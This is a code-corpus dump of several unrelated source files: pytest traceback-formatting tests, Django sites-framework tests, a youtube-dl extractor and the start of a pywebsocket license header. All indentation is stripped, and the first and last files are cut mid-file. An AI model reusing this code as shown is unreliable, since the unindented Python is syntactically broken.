py.builtin._reraise(exc, val, tb)
def f(n):
try:
do_stuff()
except:
reraise_me()
excinfo = pytest.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex is None
def test_traceback_messy_recursion(self):
#XXX: simplified locally testable version
decorator = pytest.importorskip('decorator').decorator
def log(f, *k, **kw):
print('%s %s' % (k, kw))
f(*k, **kw)
log = decorator(log)
def fail():
raise ValueError('')
fail = log(log(fail))
excinfo = pytest.raises(ValueError, fail)
assert excinfo.traceback.recursionindex() is None
def test_traceback_getcrashentry(self):
def i():
__tracebackhide__ = True
raise ValueError
def h():
i()
def g():
__tracebackhide__ = True
h()
def f():
g()
excinfo = pytest.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = _pytest._code.Code(h)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 1
assert entry.frame.code.name == 'h'
def test_traceback_getcrashentry_empty(self):
def g():
__tracebackhide__ = True
raise ValueError
def f():
__tracebackhide__ = True
g()
excinfo = pytest.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = _pytest._code.Code(g)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 2
assert entry.frame.code.name == 'g'
def hello(x):
x + 5
def test_tbentry_reinterpret():
try:
hello("hello")
except TypeError:
excinfo = _pytest._code.ExceptionInfo()
tbentry = excinfo.traceback[-1]
msg = tbentry.reinterpret()
assert msg.startswith("TypeError: ('hello' + 5)")
def test_excinfo_exconly():
excinfo = pytest.raises(ValueError, h)
assert excinfo.exconly().startswith('ValueError')
excinfo = pytest.raises(ValueError,
"raise ValueError('hello\\nworld')")
msg = excinfo.exconly(tryshort=True)
assert msg.startswith('ValueError')
assert msg.endswith("world")
def test_excinfo_repr():
excinfo = pytest.raises(ValueError, h)
s = repr(excinfo)
assert s == "<ExceptionInfo ValueError tblen=4>"
def test_excinfo_str():
excinfo = pytest.raises(ValueError, h)
s = str(excinfo)
assert s.startswith(__file__[:-9]) # pyc file and $py.class
assert s.endswith("ValueError")
assert len(s.split(":")) >= 3 # on windows it's 4
def test_excinfo_errisinstance():
excinfo = pytest.raises(ValueError, h)
assert excinfo.errisinstance(ValueError)
def test_excinfo_no_sourcecode():
try:
exec ("raise ValueError()")
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
s = str(excinfo.traceback[-1])
if py.std.sys.version_info < (2,5):
assert s == " File '<string>':1 in ?\n ???\n"
else:
assert s == " File '<string>':1 in <module>\n ???\n"
def test_excinfo_no_python_sourcecode(tmpdir):
#XXX: simplified locally testable version
tmpdir.join('test.txt').write("{{ h()}}:")
jinja2 = pytest.importorskip('jinja2')
loader = jinja2.FileSystemLoader(str(tmpdir))
env = jinja2.Environment(loader=loader)
template = env.get_template('test.txt')
excinfo = pytest.raises(ValueError,
template.render, h=h)
for item in excinfo.traceback:
print(item) #XXX: for some reason jinja.Template.render is printed in full
item.source # shouldnt fail
if item.path.basename == 'test.txt':
assert str(item.source) == '{{ h()}}:'
def test_entrysource_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = _pytest._code.ExceptionInfo()
entry = excinfo.traceback[-1]
source = entry.getsource()
assert source is not None
s = str(source).strip()
assert s.startswith("def get")
def test_codepath_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = _pytest._code.ExceptionInfo()
entry = excinfo.traceback[-1]
path = entry.path
assert isinstance(path, py.path.local)
assert path.basename.lower() == "queue.py"
assert path.check()
class TestFormattedExcinfo:
def pytest_funcarg__importasmod(self, request):
def importasmod(source):
source = _pytest._code.Source(source)
tmpdir = request.getfuncargvalue("tmpdir")
modpath = tmpdir.join("mod.py")
tmpdir.ensure("__init__.py")
modpath.write(source)
if invalidate_import_caches is not None:
invalidate_import_caches()
return modpath.pyimport()
return importasmod
def excinfo_from_exec(self, source):
source = _pytest._code.Source(source).strip()
try:
exec (source.compile())
except KeyboardInterrupt:
raise
except:
return _pytest._code.ExceptionInfo()
assert 0, "did not raise"
def test_repr_source(self):
pr = FormattedExcinfo()
source = _pytest._code.Source("""
def f(x):
pass
""").strip()
pr.flow_marker = "|"
lines = pr.get_source(source, 0)
assert len(lines) == 2
assert lines[0] == "| def f(x):"
assert lines[1] == " pass"
def test_repr_source_excinfo(self):
""" check if indentation is right """
pr = FormattedExcinfo()
excinfo = self.excinfo_from_exec("""
def f():
assert 0
f()
""")
pr = FormattedExcinfo()
source = pr._getentrysource(excinfo.traceback[-1])
lines = pr.get_source(source, 1, excinfo)
assert lines == [
' def f():',
'> assert 0',
'E assert 0'
]
def test_repr_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("raise ValueError()", "", "exec")
try:
exec (co)
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_many_line_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("""
a = 1
raise ValueError()
""", "", "exec")
try:
exec (co)
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_source_failing_fullsource(self):
pr = FormattedExcinfo()
class FakeCode(object):
class raw:
co_filename = '?'
path = '?'
firstlineno = 5
def fullsource(self):
return None
fullsource = property(fullsource)
class FakeFrame(object):
code = FakeCode()
f_locals = {}
f_globals = {}
class FakeTracebackEntry(_pytest._code.Traceback.Entry):
def __init__(self, tb):
self.lineno = 5+3
@property
def frame(self):
return FakeFrame()
class Traceback(_pytest._code.Traceback):
Entry = FakeTracebackEntry
class FakeExcinfo(_pytest._code.ExceptionInfo):
typename = "Foo"
def __init__(self):
pass
def exconly(self, tryshort):
return "EXC"
def errisinstance(self, cls):
return False
excinfo = FakeExcinfo()
class FakeRawTB(object):
tb_next = None
tb = FakeRawTB()
excinfo.traceback = Traceback(tb)
fail = IOError() # noqa
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
fail = py.error.ENOENT # noqa
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
def test_repr_local(self):
p = FormattedExcinfo(showlocals=True)
loc = {'y': 5, 'z': 7, 'x': 3, '@x': 2, '__builtins__': {}}
reprlocals = p.repr_locals(loc)
assert reprlocals.lines
assert reprlocals.lines[0] == '__builtins__ = <builtins>'
assert reprlocals.lines[1] == 'x = 3'
assert reprlocals.lines[2] == 'y = 5'
assert reprlocals.lines[3] == 'z = 7'
def test_repr_tracebackentry_lines(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1)
excinfo.traceback = excinfo.traceback.filter()
p = FormattedExcinfo()
reprtb = p.repr_traceback_entry(excinfo.traceback[-1])
# test as intermittent entry
lines = reprtb.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
# test as last entry
p = FormattedExcinfo(showlocals=True)
repr_entry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = repr_entry.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
assert lines[2] == 'E ValueError: hello'
assert lines[3] == 'E world'
assert not lines[4:]
loc = repr_entry.reprlocals is not None
loc = repr_entry.reprfileloc
assert loc.path == mod.__file__
assert loc.lineno == 3
#assert loc.message == "ValueError: hello"
def test_repr_tracebackentry_lines2(self, importasmod):
mod = importasmod("""
def func1(m, x, y, z):
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1, "m"*90, 5, 13, "z"*120)
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('m', repr("m"*90))
assert reprfuncargs.args[1] == ('x', '5')
assert reprfuncargs.args[2] == ('y', '13')
assert reprfuncargs.args[3] == ('z', repr("z" * 120))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "m = " + repr('m' * 90)
assert tw.lines[1] == "x = 5, y = 13"
assert tw.lines[2] == "z = " + repr('z' * 120)
def test_repr_tracebackentry_lines_var_kw_args(self, importasmod):
mod = importasmod("""
def func1(x, *y, **z):
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1, 'a', 'b', c='d')
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('x', repr('a'))
assert reprfuncargs.args[1] == ('y', repr(('b',)))
assert reprfuncargs.args[2] == ('z', repr({'c': 'd'}))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "x = 'a', y = ('b',), z = {'c': 'd'}"
def test_repr_tracebackentry_short(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 5
# test last entry
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprtb.lines
assert lines[0] == ' raise ValueError("hello")'
assert lines[1] == 'E ValueError: hello'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 3
def test_repr_tracebackentry_no(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="no")
p.repr_traceback_entry(excinfo.traceback[-2])
p = FormattedExcinfo(style="no")
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[0] == 'E ValueError: hello'
assert not lines[1:]
def test_repr_traceback_tbfilter(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(tbfilter=True)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
p = FormattedExcinfo(tbfilter=False)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 3
def test_traceback_short_no_source(self, importasmod, monkeypatch):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
from _pytest._code.code import Code
monkeypatch.setattr(Code, 'path', 'bogus')
excinfo.traceback[0].frame.code.path = "bogus"
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
last_p = FormattedExcinfo(style="short")
last_reprtb = last_p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
last_lines = last_reprtb.lines
monkeypatch.undo()
assert lines[0] == ' func1()'
assert last_lines[0] == ' raise ValueError("hello")'
assert last_lines[1] == 'E ValueError: hello'
def test_repr_traceback_and_excinfo(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
for style in ("long", "short"):
p = FormattedExcinfo(style=style)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
assert reprtb.style == style
assert not reprtb.extraline
repr = p.repr_excinfo(excinfo)
assert repr.reprtraceback
assert len(repr.reprtraceback.reprentries) == len(reprtb.reprentries)
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.message == "ValueError: 0"
def test_repr_traceback_with_invalid_cwd(self, importasmod, monkeypatch):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo()
def raiseos():
raise OSError(2)
monkeypatch.setattr(py.std.os, 'getcwd', raiseos)
assert p._makepath(__file__) == __file__
p.repr_traceback(excinfo)
def test_repr_excinfo_addouterr(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
repr.addsection("title", "content")
twmock = TWMock()
repr.toterminal(twmock)
assert twmock.lines[-1] == "content"
assert twmock.lines[-2] == ("-", "title")
def test_repr_excinfo_reprcrash(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.lineno == 3
assert repr.reprcrash.message == "ValueError"
assert str(repr.reprcrash).endswith("mod.py:3: ValueError")
def test_repr_traceback_recursion(self, importasmod):
mod = importasmod("""
def rec2(x):
return rec1(x+1)
def rec1(x):
return rec2(x-1)
def entry():
rec1(42)
""")
excinfo = pytest.raises(RuntimeError, mod.entry)
for style in ("short", "long", "no"):
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback(excinfo)
assert reprtb.extraline == "!!! Recursion detected (same locals & position)"
assert str(reprtb)
def test_tb_entry_AssertionError(self, importasmod):
# probably this test is a bit redundant
# as py/magic/testing/test_assertion.py
# already tests correctness of
# assertion-reinterpretation logic
mod = importasmod("""
def somefunc():
x = 1
assert x == 2
""")
excinfo = pytest.raises(AssertionError, mod.somefunc)
p = FormattedExcinfo()
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[-1] == "E assert 1 == 2"
def test_reprexcinfo_getrepr(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
for style in ("short", "long", "no"):
for showlocals in (True, False):
repr = excinfo.getrepr(style=style, showlocals=showlocals)
assert isinstance(repr, ReprExceptionInfo)
assert repr.reprtraceback.style == style
def test_reprexcinfo_unicode(self):
from _pytest._code.code import TerminalRepr
class MyRepr(TerminalRepr):
def toterminal(self, tw):
tw.line(py.builtin._totext("я", "utf-8"))
x = py.builtin._totext(MyRepr())
assert x == py.builtin._totext("я", "utf-8")
def test_toterminal_long(self, importasmod):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == " def f():"
assert tw.lines[1] == "> g(3)"
assert tw.lines[2] == ""
assert tw.lines[3].endswith("mod.py:5: ")
assert tw.lines[4] == ("_ ", None)
assert tw.lines[5] == ""
assert tw.lines[6] == " def g(x):"
assert tw.lines[7] == "> raise ValueError(x)"
assert tw.lines[8] == "E ValueError: 3"
assert tw.lines[9] == ""
assert tw.lines[10].endswith("mod.py:3: ValueError")
def test_toterminal_long_missing_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tmpdir.join('mod.py').remove()
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_incomplete_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tmpdir.join('mod.py').write('asdf')
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_filenames(self, importasmod):
mod = importasmod("""
def f():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.f)
tw = TWMock()
path = py.path.local(mod.__file__)
old = path.dirpath().chdir()
try:
repr = excinfo.getrepr(abspath=False)
repr.toterminal(tw)
line = tw.lines[-1]
x = py.path.local().bestrelpath(path)
if len(x) < len(str(path)):
assert line == "mod.py:3: ValueError"
repr = excinfo.getrepr(abspath=True)
repr.toterminal(tw)
line = tw.lines[-1]
assert line == "%s:3: ValueError" %(path,)
finally:
old.chdir()
@pytest.mark.parametrize('reproptions', [
{'style': style, 'showlocals': showlocals,
'funcargs': funcargs, 'tbfilter': tbfilter
} for style in ("long", "short", "no")
for showlocals in (True, False)
for tbfilter in (True, False)
for funcargs in (True, False)])
def test_format_excinfo(self, importasmod, reproptions):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tw = py.io.TerminalWriter(stringio=True)
repr = excinfo.getrepr(**reproptions)
repr.toterminal(tw)
assert tw.stringio.getvalue()
def test_native_style(self):
excinfo = self.excinfo_from_exec("""
assert 0
""")
repr = excinfo.getrepr(style='native')
assert "assert 0" in str(repr.reprcrash)
s = str(repr)
assert s.startswith('Traceback (most recent call last):\n File')
assert s.endswith('\nAssertionError: assert 0')
assert 'exec (source.compile())' in s
# python 2.4 fails to get the source line for the assert
if py.std.sys.version_info >= (2, 5):
assert s.count('assert 0') == 2
def test_traceback_repr_style(self, importasmod):
mod = importasmod("""
def f():
g()
def g():
h()
def h():
i()
def i():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
excinfo.traceback[1].set_repr_style("short")
excinfo.traceback[2].set_repr_style("short")
r = excinfo.getrepr(style="long")
tw = TWMock()
r.toterminal(tw)
for line in tw.lines: print (line)
assert tw.lines[0] == ""
assert tw.lines[1] == " def f():"
assert tw.lines[2] == "> g()"
assert tw.lines[3] == ""
assert tw.lines[4].endswith("mod.py:3: ")
assert tw.lines[5] == ("_ ", None)
assert tw.lines[6].endswith("in g")
assert tw.lines[7] == " h()"
assert tw.lines[8].endswith("in h")
assert tw.lines[9] == " i()"
assert tw.lines[10] == ("_ ", None)
assert tw.lines[11] == ""
assert tw.lines[12] == " def i():"
assert tw.lines[13] == "> raise ValueError()"
assert tw.lines[14] == "E ValueError"
assert tw.lines[15] == ""
assert tw.lines[16].endswith("mod.py:9: ValueError")
|
rhertzog/django | refs/heads/master | tests/sites_tests/tests.py | 16 | from __future__ import unicode_literals
from django.apps import apps
from django.apps.registry import Apps
from django.conf import settings
from django.contrib.sites import models
from django.contrib.sites.management import create_default_site
from django.contrib.sites.middleware import CurrentSiteMiddleware
from django.contrib.sites.models import Site, clear_site_cache
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.signals import post_migrate
from django.http import HttpRequest, HttpResponse
from django.test import TestCase, modify_settings, override_settings
from django.test.utils import captured_stdout
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class SitesFrameworkTests(TestCase):
multi_db = True
def setUp(self):
self.site = Site(
id=settings.SITE_ID,
domain="example.com",
name="example.com",
)
self.site.save()
def tearDown(self):
Site.objects.clear_cache()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertIsInstance(s, Site)
s.delete()
with self.assertRaises(ObjectDoesNotExist):
Site.objects.get_current()
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
def test_delete_all_sites_clears_cache(self):
# When all site objects are deleted the cache should also
# be cleared and get_current() should raise a DoesNotExist.
self.assertIsInstance(Site.objects.get_current(), Site)
Site.objects.all().delete()
with self.assertRaises(Site.DoesNotExist):
Site.objects.get_current()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertIsInstance(site, Site)
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
with self.assertRaises(ObjectDoesNotExist):
get_current_site(request)
# A RequestSite is returned if the sites framework is not installed
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
site = get_current_site(request)
self.assertIsInstance(site, RequestSite)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com'])
def test_get_current_site_no_site_id(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
del settings.SITE_ID
site = get_current_site(request)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com', 'example.net'])
def test_get_current_site_no_site_id_and_handle_port_fallback(self):
request = HttpRequest()
s1 = self.site
s2 = Site.objects.create(domain='example.com:80', name='example.com:80')
# Host header without port
request.META = {'HTTP_HOST': 'example.com'}
site = get_current_site(request)
self.assertEqual(site, s1)
# Host header with port - match, no fallback without port
request.META = {'HTTP_HOST': 'example.com:80'}
site = get_current_site(request)
self.assertEqual(site, s2)
# Host header with port - no match, fallback without port
request.META = {'HTTP_HOST': 'example.com:81'}
site = get_current_site(request)
self.assertEqual(site, s1)
# Host header with non-matching domain
request.META = {'HTTP_HOST': 'example.net'}
with self.assertRaises(ObjectDoesNotExist):
get_current_site(request)
# Ensure domain for RequestSite always matches host header
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
request.META = {'HTTP_HOST': 'example.com'}
site = get_current_site(request)
self.assertEqual(site.name, 'example.com')
request.META = {'HTTP_HOST': 'example.com:80'}
site = get_current_site(request)
self.assertEqual(site.name, 'example.com:80')
def test_domain_name_with_whitespaces(self):
# Regression for #17320
# Domain names are not allowed contain whitespace characters
site = Site(name="test name", domain="test test")
with self.assertRaises(ValidationError):
site.full_clean()
site.domain = "test\ttest"
with self.assertRaises(ValidationError):
site.full_clean()
site.domain = "test\ntest"
with self.assertRaises(ValidationError):
site.full_clean()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_clear_site_cache(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
self.assertEqual(models.SITE_CACHE, {})
get_current_site(request)
expected_cache = {self.site.id: self.site}
self.assertEqual(models.SITE_CACHE, expected_cache)
with self.settings(SITE_ID=''):
get_current_site(request)
expected_cache.update({self.site.domain: self.site})
self.assertEqual(models.SITE_CACHE, expected_cache)
clear_site_cache(Site, instance=self.site, using='default')
self.assertEqual(models.SITE_CACHE, {})
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example2.com'])
def test_clear_site_cache_domain(self):
site = Site.objects.create(name='example2.com', domain='example2.com')
request = HttpRequest()
request.META = {
"SERVER_NAME": "example2.com",
"SERVER_PORT": "80",
}
get_current_site(request) # prime the models.SITE_CACHE
expected_cache = {site.domain: site}
self.assertEqual(models.SITE_CACHE, expected_cache)
# Site exists in 'default' database so using='other' shouldn't clear.
clear_site_cache(Site, instance=site, using='other')
self.assertEqual(models.SITE_CACHE, expected_cache)
# using='default' should clear.
clear_site_cache(Site, instance=site, using='default')
self.assertEqual(models.SITE_CACHE, {})
def test_unique_domain(self):
site = Site(domain=self.site.domain)
msg = 'Site with this Domain name already exists.'
with self.assertRaisesMessage(ValidationError, msg):
site.validate_unique()
def test_site_natural_key(self):
self.assertEqual(Site.objects.get_by_natural_key(self.site.domain), self.site)
self.assertEqual(self.site.natural_key(), (self.site.domain,))
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_requestsite_save_notimplemented_msg(self):
# Test response msg for RequestSite.save NotImplementedError
request = HttpRequest()
request.META = {
"HTTP_HOST": "example.com",
}
msg = 'RequestSite cannot be saved.'
with self.assertRaisesMessage(NotImplementedError, msg):
RequestSite(request).save()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_requestsite_delete_notimplemented_msg(self):
# Test response msg for RequestSite.delete NotImplementedError
request = HttpRequest()
request.META = {
"HTTP_HOST": "example.com",
}
msg = 'RequestSite cannot be deleted.'
with self.assertRaisesMessage(NotImplementedError, msg):
RequestSite(request).delete()
class JustOtherRouter(object):
def allow_migrate(self, db, app_label, **hints):
return db == 'other'
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class CreateDefaultSiteTests(TestCase):
multi_db = True
def setUp(self):
self.app_config = apps.get_app_config('sites')
# Delete the site created as part of the default migration process.
Site.objects.all().delete()
def test_basic(self):
"""
#15346, #15573 - create_default_site() creates an example site only if
none exist.
"""
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertIn("Creating example.com", stdout.getvalue())
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertEqual("", stdout.getvalue())
@override_settings(DATABASE_ROUTERS=[JustOtherRouter()])
def test_multi_db_with_router(self):
"""
#16353, #16828 - The default site creation should respect db routing.
"""
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertFalse(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_multi_db(self):
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertTrue(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_save_another(self):
"""
#17415 - Another site can be created right after the default one.
On some backends the sequence needs to be reset after saving with an
explicit ID. Test that there isn't a sequence collisions by saving
another site. This test is only meaningful with databases that use
sequences for automatic primary keys such as PostgreSQL and Oracle.
"""
create_default_site(self.app_config, verbosity=0)
Site(domain='example2.com', name='example2.com').save()
def test_signal(self):
"""
#23641 - Sending the ``post_migrate`` signal triggers creation of the
default site.
"""
post_migrate.send(sender=self.app_config, app_config=self.app_config, verbosity=0)
self.assertTrue(Site.objects.exists())
@override_settings(SITE_ID=35696)
def test_custom_site_id(self):
"""
#23945 - The configured ``SITE_ID`` should be respected.
"""
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 35696)
@override_settings() # Restore original ``SITE_ID`` afterwards.
def test_no_site_id(self):
"""
#24488 - The pk should default to 1 if no ``SITE_ID`` is configured.
"""
del settings.SITE_ID
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 1)
def test_unavailable_site_model(self):
"""
#24075 - A Site shouldn't be created if the model isn't available.
"""
apps = Apps()
create_default_site(self.app_config, verbosity=0, apps=apps)
self.assertFalse(Site.objects.exists())
class MiddlewareTest(TestCase):
def test_old_style_request(self):
""" Makes sure that the request has correct `site` attribute. """
middleware = CurrentSiteMiddleware()
request = HttpRequest()
middleware.process_request(request)
self.assertEqual(request.site.id, settings.SITE_ID)
def test_request(self):
def get_response(request):
return HttpResponse(str(request.site.id))
response = CurrentSiteMiddleware(get_response)(HttpRequest())
self.assertContains(response, settings.SITE_ID)
|
janusnic/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/wayofthemaster.py | 154 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class WayOfTheMasterIE(InfoExtractor):
_VALID_URL = r'https?://www\.wayofthemaster\.com/([^/?#]*/)*(?P<id>[^/?#]+)\.s?html(?:$|[?#])'
_TEST = {
'url': 'http://www.wayofthemaster.com/hbks.shtml',
'md5': '5316b57487ada8480606a93cb3d18d24',
'info_dict': {
'id': 'hbks',
'ext': 'mp4',
'title': 'Intelligent Design vs. Evolution',
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
title = self._search_regex(
r'<img src="images/title_[^"]+".*?alt="([^"]+)"',
webpage, 'title', default=None)
if title is None:
title = self._html_search_regex(
r'<title>(.*?)</title>', webpage, 'page title')
url_base = self._search_regex(
r'<param\s+name="?movie"?\s+value=".*?/wotm_videoplayer_highlow[0-9]*\.swf\?vid=([^"]+)"',
webpage, 'URL base')
formats = [{
'format_id': 'low',
'quality': 1,
'url': url_base + '_low.mp4',
}, {
'format_id': 'high',
'quality': 2,
'url': url_base + '_high.mp4',
}]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'formats': formats,
}
|
rohlandm/servo | refs/heads/master | tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/mux.py | 636 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
